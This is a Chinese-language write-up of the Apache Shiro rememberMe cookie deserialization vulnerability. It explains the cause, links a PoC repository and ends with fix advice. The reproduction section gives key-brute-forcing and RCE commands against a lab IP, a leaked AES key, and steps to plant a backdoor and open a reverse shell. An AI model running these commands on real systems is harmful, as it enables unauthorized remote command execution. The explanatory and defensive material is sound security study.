0x01簡介

Apache Shiro是一款開源安全框架，提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用，同時也能提供健壯的安全性。

Apache Shiro 1.2.4及以前版本中，加密的使用者資訊序列化後儲存在名為remember-me的Cookie中。攻擊者可以使用Shiro的預設金鑰偽造使用者Cookie，觸發Java反序列化漏洞，進而在目標機器上執行任意命令。

0x02漏洞影響

只要rememberMe的AES加密金鑰洩露，無論shiro是什麼版本都會導致反序列化漏洞。

0x03漏洞分析

先看下官網漏洞說明：https://issues.apache.org/jira/browse/SHIRO-550

Shiro提供了記住我（RememberMe）的功能，關閉了瀏覽器下次再開啟時還是能記住你是誰，下次訪問時無需再登入即可訪問。

Shiro對rememberMe的cookie做了加密處理，shiro在CookieRememberMeManaer類中將cookie中rememberMe欄位內容分別進行 序列化、AES加密、Base64編碼操作。

在識別身份的時候，需要對Cookie裡的rememberMe欄位解密。根據加密的順序，不難知道解密的順序為：

• 獲取rememberMe cookie
• base64 decode
• 解密AES
• 反序列化

但是，AES加密的金鑰Key被硬編碼在程式碼裡，意味著每個人通過原始碼都能拿到AES加密的金鑰。因此，攻擊者構造一個惡意的物件，並且對其序列化，AES加密，base64編碼後，作為cookie的rememberMe欄位傳送。Shiro將rememberMe進行解密並且反序列化，最終造成反序列化漏洞。

0x04漏洞復現

poc：https://github.com/Kit4y/Awesome_shiro

shiro_crack.py 爆破模組

python shiro_crack.py  http://192.168.1.109/login.jsp  gzqes6.dnslog.cn

key:kPH.bIxk5D2deZiIxcaaaA

CommonsCollections2

修改shiro-rce.py

下載後門

監聽

反彈shell

 python  shiro_rce.py  http://192.168.1.109/login.jsp  "/bin/bash shell"
 

0x05 修復建議

1. 升級shiro到1.2.5及以上
2. 現在使用的rememberMe的AES加密金鑰洩露，請自己base64一個AES的金鑰，或者利用官方提供的方法生成金鑰org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()
3. 參考文章：https://blog.csdn.net/jiangbb8686/article/details/100158480